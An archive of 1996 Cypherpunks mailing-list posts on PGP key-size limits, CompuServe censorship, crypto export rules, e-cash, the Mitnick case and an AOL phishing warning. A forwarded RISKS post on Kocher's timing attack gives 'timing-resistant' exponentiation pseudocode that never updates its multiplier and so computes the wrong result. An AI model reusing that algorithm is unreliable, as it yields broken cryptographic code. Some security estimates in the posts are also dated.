-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 3 Jan 1996, Laszlo Vecsey wrote:

> > "Douglas F. Elznic" <delznic@storm.net> said:
> > 
> 
> Are you sure it's a bug in the DOS version? When I did a pgp -kg in my 
> UNIX shell (US version 2.6.2) I also entered 2048 bits and it too 
> created a 2047 bit key instead.

This is correct.  I believe there are some UNIX flavors under which U.S. PGP
can generate 2048 bit keys.  However, most only allow 2047 bit keys.  The
international version does not have this bug.

> 
> Why is there a limit to the size of the key anyway? It's too bad PGP 
> doesn't support any size key (within reason).

I really don't see the point of using a key larger than 2048 bits.  Any larger
key would actually be harder to factor than brute forcing the IDEA keyspace.
Very little security would be gained from using a key larger than 3000 bits.
Of course, one can always argue that improved factoring methods would require
that an RSA public key be longer than 3000 bits to have equal security to
IDEA.  However, I doubt that factoring methods will improve that much.  A
2048 bit key should be more than enough security for most applications.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOrkUbZc+sv5siulAQFWJgP+IlKURN3TtdXrqzLf3vCrva1tYkYC/lZU
fIOlk5Cvnt9wpm/huZKu/nESvFmJutoTbZVvJz1EPglLc1YrAlo4xyWTJZgwMpgv
khXzkEMaPludU1qfKowaM0qqeSHv80zSB97Mq0SbqNEPyM2K0r+gDobSjUgwKQCQ
Mb5D9L3hTLA=
=CDHg
-----END PGP SIGNATURE-----


finger -l markm@voicenet.com for PGP key  http://www.voicenet.com/~markm/
Fingerprint: bd24d08e3cbb53472054fa56002258d5  Key-ID: 0xF9B22BA5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 4 Jan 1996 11:10:00 +0800
To: Jason Rentz <andr0id@midwest.net>
Subject: Re: Unmuzzy Explained
In-Reply-To: <199601031924.NAA24001@cdale1.midwest.net>
Message-ID: <Pine.LNX.3.91.960103152648.6052A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> >So is the idea beyond this that if file or a group of files were to 
> >be distributed over many computers (possibly hundreds or more) then 
> >none of the computers would be "responsible" for their content? I would 
> >think that any participant in the network would have to claim full 
> >responsibility for the content, assuming the file(s) could be accessed 
> >from any of the participating servers.
> >
> Okay.  So what if serveral groups of computers, in public FTP directories,
> allowed anonymous ftp uploads of "parts" of a file that would be construde
> as bad content.  The only way to assemble the file is to download several
> parts of it from serveral diffrent servers and assemble the file on your
> system.  Thus the illegal file isn't illegal until its assembled.  Sorta
> like switchblade knives.  Lots of places can sell the parts legally, they
> just can't sell the assembled product.  Would the servers that contain
> "parts" of the file be responsible for the content?

PGP encrypting a file and putting it on an ftp site is unusable unless 
you have the key to unlock it.. in this sense the file is only partly 
on-line and therefore there would be no need to even split the file apart 
to various servers! Would the site containing this PGP encrypted data 
be responsible for it's content?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 4 Jan 1996 07:08:14 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <199601031815.KAA15424@netcom5.netcom.com>
Message-ID: <199601032143.QAA25385@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz writes:
>With a tightly focused beam (light is easy, I don't know about lower
>frequencies), you can prevent interception except by very obvious physical
>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
>avoid the need to encrypt the link (and all the paranoia about key
>management, advances in factoring etc. that that implies.)

Key management problems?  With someone across the street?  You gotta be
kidding.  If you can't memorize the key (say with the S/Key key-to-
phrase algorithm) and walk it across the street, write it on the back
of an envelope, walk it over, re-key, and burn it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 4 Jan 1996 06:38:58 +0800
To: John Goerzen <goerzenj@complete.org>
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <v02140a06ad0fcc322a7c@[165.254.158.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:03 1/2/96, John Goerzen wrote:

>CompuServe is not location-dependant.  The network operates exactly the
>same regardless of calling location (indeed, the system doesn't even know
>where you're calling from I believe).  It is a worldwide CompuServe
>Network that people use to access it.  This network just allows dialups
>and then gets the users connected to the CompuServe computers.  The main
>computers handle all traffic.  They don't are location-independant,
>making it impossible to block access based on location.

CIS always knows where you are dialing in from. Here is the start of a
typical connection (using the Mac Program NAVIGATOR).

>0001NUH
>
>Host Name:  CIS
>
>User ID: xxxxx,xxx/INT
>Password:
>[Navigator: Logged on]
>
>Welcome to CompuServe Information ServiceT01NUH @38400!
>
>Last access: Mon, Dec 18, 1995 23:11
>Connected to port CIS T01NUH @38400

That NUH identifies that I am calling in via a V34 Node in NYC and the T01
says I got the first modem on the Rotory. If CIS wanted to restrict access
via the NYS nodes, that NUH would be an adequate flag to trigger this
action.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 4 Jan 1996 08:53:59 +0800
To: rittle@comm.mot.com
Subject: Re: NYT's _Unmuzzling the Internet_
In-Reply-To: <9601030920.AA05852@supra.comm.mot.com>
Message-ID: <199601040008.QAA14520@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>At first, the Jaron proposal sounds like an interesting thought
>experiment but a total waste of bandwidth, both CPU and network, to
>me.  The unconstitutional Bill must be defeated in Congress, by that
>Presidential veto pen that Clinton has become so fond of using
>recently or the Court system, if absolutely necessary.  If none of
>that happens, then surely technology can be used to route around this
>"political" problem.  It just seems like a shame to have to expend
>technical effort and valuable network resources to play games to meet
>the letter of a law, which would so clearly break the direct spirit of
>the Constitution, if signed into Law and later found during a Supreme
>Court battle to "pass constitutional muster," as they like to say.

the laws are very likely to be challenged almost from the instant they
become active by EFF et. al-- there are a lot of powerful legal allies
against it.

however, to borrow from Nietzche, "that which attempts to destroy the
net will only help it grow stronger".

Congressmen and governments have a choice: be a friend or enemy of cyberspace. 
if they choose the latter, they will simply become increasingly irrelevant.

cyberspace will inevitably transcend local regulatory laws and feebleminded 
bureacrats in the long run. if parts of it have to go "underground" to 
do so, that will be the approach.

a network that is impervious to these misguided bureacrats, far from
being a waste of time developing as you write, would be a very, very 
significant achievement. it would be a form of technology that resists
attack on more than merely technological grounds but work in 
ideological areas as well.

I am all for helping congressmen "get a clue" at this moment in time.
the Digital Telephony bill is not a declaration of war. when they try
to tax Cyberspace or get the FCC to regulate it, or outlaw cryptography,
*that* will be a declaration of war.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Thu, 4 Jan 1996 07:06:11 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <v02140a06ad0fcc322a7c@[165.254.158.231]>
Message-ID: <Pine.A32.3.91.960103162745.188461B-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jan 1996, Robert A. Rosenberg wrote:

> CIS always knows where you are dialing in from. Here is the start of a
> typical connection (using the Mac Program NAVIGATOR).
> 
> >0001NUH
> >
> >Host Name:  CIS
> >
> >User ID: xxxxx,xxx/INT
> >Password:
> >[Navigator: Logged on]
> >
> >Welcome to CompuServe Information ServiceT01NUH @38400!
> >
> >Last access: Mon, Dec 18, 1995 23:11
> >Connected to port CIS T01NUH @38400
> 
> That NUH identifies that I am calling in via a V34 Node in NYC and the T01
> says I got the first modem on the Rotory. If CIS wanted to restrict access
> via the NYS nodes, that NUH would be an adequate flag to trigger this
> action.

Wouldn't this require some software routines added to check for this?  I
expect the decision to build or buy is what CIS is now weighing. Also, I
would imagine that a German could always call a POP outside the country if
they wanted to pay for it..... (note that I am still not in favor of the
action, but these are probably CIS's considerations.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 4 Jan 1996 07:48:55 +0800
To: cypherpunks@toad.com
Subject: crypto (semi-)export issue
Message-ID: <9601032309.AA16448@alpha>
MIME-Version: 1.0
Content-Type: text/plain



It's been a while since this went 'round, and my memories are hazy of
the details.

Isn't it the case that there are loopholes or explicit exceptions in
crypto export regulations that allow American businesses to supply
their overseas operatives with tools for secure communication back
home?  We were discussing today some stuff about our web server, and
there's some desire to provide secure access for our sales people to
internal junk.  Nobody was sure whether it'd be OK for our people in
the Evil Empire (Europe) to have the 128-bit-RC4 Netscape for that
purpose.

(If so, I wonder if the exceptions apply to other munitions too?
Like, maybe it's OK to take a medium-range missile overseas if you're
just going to use it to blow up your manager's office :-)

(No, I don't hate my manager.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 4 Jan 1996 05:50:31 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve *hasn't* banned newsgroups
Message-ID: <199601031630.RAA03391@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Vincent Cate, 1/3/96 10:41 AM:

>It seems to me that posting this widely on Compuserve (or at least on
>alt.online-service.compuserve) and then contacting CNN and making comments
>about how "the Internet interprets censorship as damage and routes around
>it" is the best way to handle this.  We want the public to get the idea
>that censorship does not work on the Internet. 

   If you do this, you'll find out very quickly just how empty (or at
least how slippery) slogans like "the Internet routes around censorship"
are: if your efforts pay off and you steer even a fraction of CIS's
traffic toward the remaining open newsservers, they'll close faster than
you can say "alt." So before you do it, think about how the net will route
around sysops closing their servers off from the net.

Hieronymous


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOqvAb3g0mNE55u1AQGG1AH/cGlgviaPIn2oDQ+QS7HJdkyeo0sRmHEO
ALtF08CmBIPK4hqcxd/3ESWi7IwoaJtEPyAMvwigPtvdTxO/q4ubMg==
=H5rs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 4 Jan 1996 07:37:30 +0800
To: cypherpunks@toad.com
Subject: Re: Starting an e-cash bank
In-Reply-To: <Pine.SOL.3.91.960103204303.5486B-100000@jaramillo.digit.ee>
Message-ID: <4cf0qb$65h@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


(Just about caught up to 2 week's worth of cypherpunks...  That 'J' got
  quite a workout...)

In article <199601031925.NAA02085@proust.suba.com>,
Alex Strasheim  <cp@proust.suba.com> wrote:
>> What does it take to be called a bank?
>
>Is it necessary to be called a bank?  I've got a storefront in Chicago.  
>What would prevent me from opening up a Mark Twain account and buying and 
>selling ecash on floppies, in person?  Do account holders have to agree 
>not to do that before Mark Twain gives them an account?  Is it illegal?
>
>The currency exchange model almost seems more appropriate for most users
>than the bank model.

Isn't that what Sameer announced in his latest(?) press release?
c2.org has a MT account.  c2.org customers don't.  The customers
receive ecash payments from the Net (for accessing their |<00|_ web pages)
and give the payments to c2.org, which deposits them in its MT acocunt,
and credits the customer (minus a percentage?  Lower than the customer
would otherwise get from MT, but higher than c2.org (a merchant) is charged?).
Did I get that right?

  - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 4 Jan 1996 07:46:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <55zqc557z8.fsf@galil.austnsc.tandem.com>
Message-ID: <199601032300.SAA15180@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sten Drescher writes:
> Since I think that
> increasing the RSA keysize is supposed to double the attack time, if a
> RSA key size of N takes as much time to break as 1 IDEA key, making the
> RSA key N+8 bits makes it better to break the IDEA keys of 200 messages
> rather than the RSA key.
> 
> Does anyone know if there are comparisons of estimates of the
> time to break the IDEA session keys used in PGP vs time to break RSA
> keys of various sizes?

Off the top of my head, the figure I have usually heard quoted puts RSA at
about 100 times slower than your average symmetric key algorithm. So ignoring
key setup, I would expect an extra factor of 100 in the brute forcing time
for RSA over IDEA. 

I don't believe it's worth spending much time worrying about your RSA
key size. If you pick some decent size (1-2k), it's likely that RSA itself
will have been broken, or your key compromised by some other means, before
any direct brute force attack will succeed. 

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOsKNCnaAKQPVHDZAQHIRgf/ZS29BnGaZ60PeMlhIoniETAtI2VYNstM
yFV6tl5w1Kzu9Q2TcJk/tdpW9QVbWOrB2IMdELBrk1urcYBS6YUBXcAlI7UhinA9
sapoZpz3WUCnRdb/64HkGFsOYgEVyVjsrrmu+M2RUUNRnOwWSS0KFAz8GYqj83ry
xSpvrRNJPqCNARBsh9VPKgrRS1qNH5Zc1Tyu5Dr/E3OiQkzVCqHhQYYDj/PCESLL
Y1Sly6n133Jq8J3TWoXAzeNKAOwy4tLz6TFn63OgbfcnTp1hndsMlIwCN3tzn9el
T7b4LBMeVq2hXVkmotE0BURW7Phuckpmk1Xiow3vBXFMRxWPFz6lOg==
=Njig
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 4 Jan 1996 07:48:57 +0800
To: cypherpunks@toad.com
Subject: New Mitnick Book
Message-ID: <199601032306.SAA07090@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Jonathan Littman, an investigative reporter, has published
   "The Fugitive Game: Online With Kevin Mitnick," Little
   Brown, 1996. 381 pp. $23.95. ISBN 0-316-52858-7.

   It is a dramatic recount of Mitnick's exploits; the pursuit
   by Shimomura, Markoff, telcos and Feds; the bust and
   Markoff's tales; The Well controversies aand disputes about
   what really happened; suspicions of Shimomura and Markoff -
   - their complicity with TLAs, their movie and book
   dealings, their disputes with hackers and journalists. What
   Mitnick was telling Littman while a fugitive.

   Littman ends with this letter from Markoff and Shimomura:

   October 8, 1995
   Jonathan Littman
   38 Miller Avenue Suite 122
   Mill Valley, California 94941

   Dear Jonathan,

   This is in response to your separate letters to us. We
   apologize for not being more prompt, Tsutomu was travelling
   on business and did not receive your September 5 letter
   until recently. As you know we have a contract with
   Hyperion for Tsutomu's account of his participation in the
   arrest of Kevin Mitnick, and at the request of our
   publisher we have decided not to participate in other books
   on the same subject.

   First, in response to your September 7 request to John
   Markoff, for permission to reprint his March 14 Well
   posting, he is not willing to give permission.

   However, we do think it is appropriate to respond to
   several points where you have received inaccurate
   information.

   Our responses are not intended to be a comprehensive answer
   to your list of questions, but only to protect you from
   including libelous material in your book.

   Tsutomu was not asked by any governmental, military or
   intelligence representative to assist in the capture of Mr.
   Mitnick. All of his actions were taken in response to
   requests for assistance from both The Well and Netcom to
   deal with extensive and persistent break-ins.

   Tsutomu's decision to tell John Markoff that he was
   travelling to Raleigh on Sunday morning was done without
   contact with any law enforcement agency. Markoff flew to
   Raleigh independently six hours later after discussing the
   possibility of a story with his editors at the New York
   Times. Markoff did not at any time assist or participate in
   any aspect of the investigation into Kevin Mitnick's
   activities; Markoff was there only as an observer in his
   role as a newspaper reporter.

   Moreover, in Raleigh on Sunday evening the Cellscope
   equipment was never placed in Markoff's car, and there was
   never any discussion about taking it out of the Cellular
   One engineer's van or about placing it in Markoff's car.
   Markoff parked his car near the cell site that night and
   then later drove back to his hotel.

   Tsutomu never told anyone from law enforcement that anyone
   had authorized or cleared Markoff's presence in Raleigh.

   Tsutomu was informed by the Justice Department that his
   actions on behalf of the Internet providers and the
   cellular telephone company during the course of the
   investigation were covered under their fraud detection and
   prevention exception granted to these organizations under
   the ECPA.

   Tsutomu did have discussions with the National Security
   Agency about funding computer security research, the
   results of which were to be placed in the public domain,
   however no research grant was ever made. Tsutomu was not
   aware of any statements made in the search warrant until
   many days after the arrest.

   Tsutomu did not lure Mitnick or anyone else into
   breaking-in to his computers. The attack was entirely
   unprovoked.

   No copies of any files allegedly stolen by Mitnick were
   provided by Tsutomu to anyone other than the legitimate
   owners.

   The first discussion of the possibility of a book on the
   subject of Kevin Mitnick's arrest took place on Thursday
   February 16, when John Markoff received a telephone call
   from John Brockman, a New York City literary agent,
   proposing a collaboration between Markoff and Shimomura.

   You will remember, we hope, that after his July 4, 1994
   article about the hunt for Mitnick, Markoff did not wish to
   pursue the subject of Mitnick's life as a fugitive and
   referred a free-lance article on the subject proposed by
   Playboy to you.

   Also please note that you are inaccurate in stating that
   Tsutomu requested immunity before testifying before
   Congress on April 1993.

   We realize this is a delicate issue for you because of your
   involvement and communication with Kevin Mitnick during the
   period he was a fugitive. However, since your questions
   suggest you believe there may have been something
   inappropriate in Tsutomu's cellular telephone software
   development work, if you do include material in your book
   along this line, journalistic ethics require you to include
   the following: Tsutomu, unlike Mitnick, in all of his
   computer security research over a fifteen year period, has
   always, whenever he has found a vulnerability, made it
   known to the appropriate people, whether CERT, or a private
   company at risk, or the United States Congress.

   Sincerely, (signed) John Markoff Tsutomu Shimomura












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 4 Jan 1996 17:36:31 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla ISPs
Message-ID: <v02120d17ad10e6cc866e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:07 1/3/96, Peter Monta wrote:

>I'm skeptical about cable modems---few cable providers have adequate
>return paths, and everyone competes for the downlink bandwidth.
>Broadcast is not the right architecture.

Taking a closer look at it, you will find that the cable giants have
prepared themselves rather well. In the US, there are about 3300 subs per
headend. Each of which is served by about 7 trunks. Moreover, the cable
operators have been busy laying fiber to all the headends. In fact, the
vast majority of headends, certainly all the ones in the interesting
markets have fiber on site today.

The bandwidth crunch only happens if most cable subscribers want to use the
ISP services. How many of the 3300 subs have PCs and are willing to pay
$500-1000 per hookup? If you add switching to the picture, not that
switching was necessarily needed, things look even better for cable based
ISPs.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Thu, 4 Jan 1996 11:37:08 +0800
To: cypherpunks@toad.com
Subject: AOL security letter
Message-ID: <199601040227.SAA14744@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Looks like AOL is being dragged, kicking and screaming, into the world of
security. This is a note that AOL subscribers are receiving today:

>>>>
bj:	ALERT: Password Security
Date:	95-12-31 07:27:13 EST
From:	Steve Case
Sent on:	America Online (using Stratus)

Dear Friend of America Online,

I want to raise your awareness about an issue that affects us all: the
importance of never revealing your password.

Recently there have been a few incidents where computer hackers have tried
to gain access to passwords by soliciting individuals online.  These hackers
have increased their level of sophistication so much that they have begun to
correspond in a style to make you believe they are representing America
Online.  Here's an edited excerpt from a recent e-mail attempt:


"Dear AOL Community Member:
AOL is experiencing major problems...Due to a virus that was recently
loaded...onto our main user database, containing most of our member
registration information, we are currently experiencing widespread system
failure. The problem originated...when our system was illegally breached by
a former AOL employee.
We believe the employee, who is currently being questioned by authorities,
loaded a virus into our database. Because we identified the problem quickly,
we were able to stop the problem before the entire database was deleted. 
The files that were deleted, however, happened to be the database link
files...that link a user's password and screen name to the rest of their
account. We are currently...working with McAfee Associates (Anti-Virus), to
replace the lost files...
...Some of the effects as a result of not having the database link files
include: random log-off's, AOLnet runs slower, and Email may accidentally be
deleted. These problems are MAJOR inconveniences to our users, so we need
your help to fix the problem."


The letter continues, outlining the steps you must take to keep your account
active, and awarding you free online hours for your troubles.

Sending e-mail is just one tactic.  Another approach is by using IMs
(Instant Messages), where a hacker will notice you are online and try to
pass himself off as an employee.  Hackers sometimes scan chat areas and the
member directory for screen names.

Simply put, your passwords are like items in your safety deposit box.
They're confidential.  YOU are the only person who should know your
password.  Giving someone (even unintentionally) your password -- especially
online -- is like handing over your wallet, keys, and other valuables to
complete strangers.

There is absolutely no reason why America Online would ever ask you for your
password! Be aware: NO EMPLOYEE OR REPRESENTATIVE OF AMERICA ONLINE WILL
EVER ASK YOU FOR YOUR PASSWORD, YOUR CREDIT CARD NUMBER, OR TO VERIFY YOUR
BILLING INFORMATION ONLINE.  IF THEY DO, BE SUSPICIOUS AND TAKE
ACTION--REPORT IT IMMEDIATELY.

Here are some quick steps to keep your passwords secure:

1) Immediately change your passwords (at keyword PASSWORD) to at least 6
alphanumeric characters -- combination of letters and numbers -- for all of
your sub-accounts.  Delete unused sub-accounts.
2) NEVER use your screen name, first or last name, town, street, etc. as a
password. Do not use a common word.  Add a few digits to a word, or misspell
it.  Hackers use all kinds of programs that search for common words.
3) Inform spouses, children, and others who have access to your account to
take the same safety measures, and to NEVER give out passwords.
4) Report suspicious behavior at keyword STAFFPAGER immediately.

Computer hacking on America Online is not widespread.  But it's an activity
-- and an illegal act -- which hinders our ability to conduct business and
ensure a safe online community.  

AOL will pursue all legal action and law enforcement protection within our
right to protect the security of our service.  

We also rely on our members, partners, remote community leaders, and others
with overhead accounts much like a neighborhood watch program -- to help
crush hacking, to maintain confidentiality of the simplest personal
belonging (your password), and to report activity of this kind to AOL
immediately.

If you have any questions, please discuss them with your contact at AOL.

Thank you, and have a Happy New Year.

Regards,

Steve Case


Corey Bridges
Security Documentation
Netscape Communications Corporation
home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc Martinez"   <lastxit@alphachannel.com>
Date: Thu, 4 Jan 1996 09:39:55 +0800
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <Pine.LNX.3.91.960103133137.3229F-100000@micro.internexus.net>
Message-ID: <wtbuokpyvr.fsf@arrakis.alphachannel.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <Pine.LNX.3.91.960103133137.3229F-100000@micro.internexus.net>
 master@internexus.net (Laszlo Vecsey) writes:

   Are you sure it's a bug in the DOS version? When I did a pgp -kg in my 
   UNIX shell (US version 2.6.2) I also entered 2048 bits and it too 
   created a 2047 bit key instead.

   Why is there a limit to the size of the key anyway? It's too bad PGP 
   doesn't support any size key (within reason).

Regarding the unix version, what sort of processor is the machine
running?  We noticed on a 486 running linux, with a vanilla MIT
release pgp, that it made 2047 bit keys when prompted for 2048.
However, after compiling the same code on a SunOS 4.1.3 it had no
problems making a 2048 key, though it took significantly longer due to
differences in the how the operating systems function.  Also, most of
the unix machines I work on now are running hacked versions which will
handle up to 4096 bit keys, so I could handle all of my keys
relatively painlessly (and because I was curious about the code in pgp
itself). 

In any case, that's about all I know on the topic, check the
architecture of the machine your shell account is on, and if you have
access to a sun, you might try it there.  If you really want larger
keys just poke around in the code, it's not that hard of a feat to
accomplish.  
- ----BEGIN PGP SIGNED HEADERS----
From: "Marc Martinez"   <lastxit@alphachannel.com>
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
Date: 03 Jan 1996 18:49:44 -0600
Message-ID: <wtbuokpyvr.fsf@arrakis.alphachannel.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQDVAwUBMOskKHutHIVnrGOxAQGvIAYAwU7RJkBu33HXd7g1V1DtH7p8cXTwpral
lrYDCQDwRflxJUeNRAGUvL5cnfCGP0SGLcolkw4bsia92JtooyBrPhzNkAvh56O7
r9cXNb7EVnZIhEbgc5aVwa2BBSNgsbXNMYKhXmknrCkIUdBvIAf539xzkq5CXQQS
4ht8zhNku9UhAtuwNKa85zxUW+xmGdHX5kVn+aVAWUByxw5ndXq0aQkGFU7W9PVq
Vr/qLVrMheMMgIWw9w86ZQnz7UmWbWht
=vl/U
-----END PGP SIGNATURE-----

-- 
 Marc Martinez        "Sleep is unnecessary in the presence of more espresso."
 lastxit@mindport.net         Key fingerprint:   
 PGP public key available      47 AD 25 FF C2 B7 F8 57 C5 B6 2E B3 5E 98 A5 DE 
  by finger or keyserver




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve14571@aol.com
Date: Thu, 4 Jan 1996 08:27:27 +0800
To: goerzenj@complete.org
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <960103185717_83306823@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-01-03 00:34:25 EST, you write:

>CompuServe is not location-dependant.  The network operates exactly the 
>same regardless of calling location (indeed, the system doesn't even know 
>where you're calling from I believe).  It is a worldwide CompuServe 
>Network that people use to access it.  This network just allows dialups 
>and then gets the users connected to the CompuServe computers.  The main 
>computers handle all traffic.  They don't are location-independant, 
>making it impossible to block access based on location.

I see two possible ways to censor German users only (but I still believe
censoring anyone is wrong).  First, the "main computers" could be told where
they are, and "censored" material could be filtered at that level before it
is sent to individual users.  Or CompuServe could release a software update
for German users.  The software would not recognize banned newsgroups.  How
difficult could that possibly be?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 4 Jan 1996 11:20:43 +0800
To: cypherpunks@toad.com
Subject: Kocher timing attack in RISKS
Message-ID: <v0153050dad10efd26ebd@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Reproduced here from RISKS digest:

------------------------------

Date: Tue, 26 Dec 1995 17:23:09 -0100
From: Saso Tomazic <saso.tomazic@fer.uni-lj.si>
Subject: Re: Timing cryptanalysis of RSA, DH, DSS (Kocher, RISKS-17.53)

The timing attack presented by Paul C. Kocher in his extended abstract
of the paper "Cryptanalysis of Diffie-Helman, RSA, DSS, and Other
Systems Using Timing Attacks"
  (ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps)
is really worth consideration, however I would like to stress there is no
need for panic, mainly for two reasons:

1) Security of practical cryptosystems do not rest solely on security of
crypt algorithm. In fact, cryptoanalysis attacks are rare, due to strong
crypto algorithms that are presently known. More often cryptosystems are
broken using other weak points of cryptosystems as insecurity of keys, bad
key management, easy to guess passwords, computer screen radiation,
monitoring the keystrokes of computer in network, ...  The timing attack can
be considered just as one of them, not the most dangerous one. For practical
cryptosystem, it would be extremely difficult to measure exact timing of
encryption process, at least much more difficult as to monitor keystrokes or
to capture entire message from the screen. The intruder, who would be able
to measure the exact timing of encryption in a multitasking environment,
would probably also have access to everything else (i.e., secret message,
secret key, passwords, ...) and thus no need to measure timing.

2.) It is not so difficult to rewrite algorithms to be resistant to timing
attacks, i.e., to have execution time independent of secret key.  For
example, the algorithm to compute R = y^x mod n given in the Kocher paper
can be simply rewritten as:

Let R = 1.
Let A = 1.
Let z = y.
For i=0 upto (bits_in_x-1):
   If (bit i of x) is 1 then
         Let A = (R*z) mod n
   Else
         Let B = (R*z) mod n
Let y = y^2 mod n.
Let R = A.
End.

to be resistant to timing attacks.

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 4 Jan 1996 11:53:31 +0800
To: cypherpunks@toad.com
Subject: Duplicate messages
Message-ID: <2.2.32.19960104033750.009219b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Has everyone else been getting two messages for the price of one?

(Maybe Tim May is getting back at me for the semi-plagerized sig quote...)

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 4 Jan 1996 09:35:05 +0800
To: cypherpunks@toad.com
Subject: RE: crypto (semi-)export issue
Message-ID: <70723.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  m5@dev.tivoli.com (Mike McNally)  writes:

> Isn't it the case that there are loopholes or explicit exceptions in
> crypto export regulations that allow American businesses to supply
> their overseas operatives with tools for secure communication back
> home?  We were discussing today some stuff about our web server, and
> there's some desire to provide secure access for our sales people to
> internal junk.  Nobody was sure whether it'd be OK for our people in
> the Evil Empire (Europe) to have the 128-bit-RC4 Netscape for that
> purpose.


At the December NIST Key Escrow/GAK export meeting, Mike Nelson said that
there are rules that allow US companies to "easily" export strong encryption
to their overseas operations. The important (key :-) idea
is that the export is to protect the corporate assetts of US companies.

He seemed to imply that exporting, say PGP, for internal corporate use
was fine and easily done.

Other folks later claimed that this wasn't quite as easy as he claimed.

